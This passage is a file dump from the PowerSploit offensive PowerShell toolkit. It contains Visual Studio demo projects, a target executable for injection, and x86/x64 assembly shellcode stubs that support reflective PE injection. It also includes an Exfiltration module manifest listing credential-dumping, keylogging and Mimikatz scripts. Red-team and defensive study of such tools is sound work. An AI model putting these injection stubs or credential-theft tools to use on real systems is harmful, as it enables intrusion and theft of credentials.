2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32
18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64
19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64
20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32
21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64
23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64
24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32
26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64
27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64
28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32
29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32
30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64
31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Press enter to close.\n");
12 | getchar();
13 |
14 | return 0;
15 | }
16 |
17 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push rbx
7 | mov rbx, rsp
8 | and sp, 0xff00
9 |
10 | ; Call DllMain
11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell
12 | mov rdx, 0x1 ; PROCESS_ATTACH
13 | mov r8, 0x0 ; NULL
14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
15 | call rax
16 |
17 | ; Fix stack
18 | mov rsp, rbx
19 | pop rbx
20 | ret
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Set a var to 1, let PS known exe is exiting
7 | mov rbx, 0x4141414141414141
8 | mov [rbx], byte 0x01
9 |
10 | ; Call exitthread instead of exitprocess
11 | sub rsp, 0xc0
12 | and sp, 0xFFf0 ; Needed for stack alignment
13 | mov rbx, 0x4141414141414141
14 | call rbx
15 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of rbx and stack
7 | push rbx
8 | mov rbx, rsp
9 |
10 | ; Set up stack for function call to GetProcAddress
11 | sub rsp, 0x20
12 | and sp, 0xffc0
13 |
14 | ; Call getprocaddress
15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS
16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
18 | call rax
19 |
20 | ; Store the result
21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
22 | mov [rcx], rax
23 |
24 | ; Restore stack
25 | mov rsp, rbx
26 | pop rbx
27 | ret
28 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save rsp and setup stack for function call
7 | push rbx
8 | mov rbx, rsp
9 | sub rsp, 0x20
10 | and sp, 0xffc0
11 |
12 | ; Call LoadLibraryA
13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
15 | call rdx
16 |
17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
18 | mov [rdx], rax
19 |
20 | ; Fix stack
21 | mov rsp, rbx
22 | pop rbx
23 | ret
24 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push ebx
7 | mov ebx, esp
8 | and esp, 0xfffffff0
9 |
10 | ; Call DllMain
11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
12 | mov edx, 0x1 ; PROCESS_ATTACH
13 | mov eax, 0x0 ; NULL
14 | push eax
15 | push edx
16 | push ecx
17 | mov eax, 0x41414141 ; Address of DllMain, set by PS
18 | call eax
19 |
20 | ; Fix stack
21 | mov esp, ebx
22 | pop ebx
23 | ret
24 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Set a var to 1, let PS know the EXE is exiting
6 | mov ebx, 0x41414141
7 | mov [ebx], byte 0x01
8 |
9 | ; Call exitthread instead of exit process
10 | sub esp, 0x20
11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment
12 | mov ebx, 0x41414141
13 | call ebx
14 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of ebx and stack
7 | push ebx
8 | mov ebx, esp
9 |
10 | ; Align stack
11 | and esp, 0xffffffc0
12 |
13 | ; Call GetProcAddress
14 | mov eax, 0x41414141 ; DllHandle, supplied by PS
15 | mov ecx, 0x41414141 ; Function name, supplied by PS
16 | push ecx
17 | push eax
18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
19 | call eax
20 |
21 | ; Write GetProcAddress return value to an address supplied by PS
22 | mov ecx, 0x41414141 ; Address supplied by PS
23 | mov [ecx], eax
24 |
25 | ; Fix stack
26 | mov esp, ebx
27 | pop ebx
28 | ret
29 |
--------------------------------------------------------------------------------
/CodeExecution/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module CodeExecution`
7 |
8 | To see the commands imported, type `Get-Command -Module CodeExecution`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Exfiltration.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Exfiltration Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Format files (.ps1xml) to be loaded when importing this module
25 | FormatsToProcess = 'Get-VaultCredential.ps1xml'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
32 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
33 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
34 | 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
35 | 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
36 |
37 | }
38 |
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/Exfiltration/Get-VaultCredential.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | VaultItemView
6 |
7 | VAULTCLI.VAULTITEM
8 |
9 |
10 |
11 |
12 |
13 |
14 | Vault
15 |
16 |
17 | Resource
18 |
19 |
20 | Identity
21 |
22 |
23 | Credential
24 |
25 |
26 | PackageSid
27 |
28 |
29 | LastModified
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
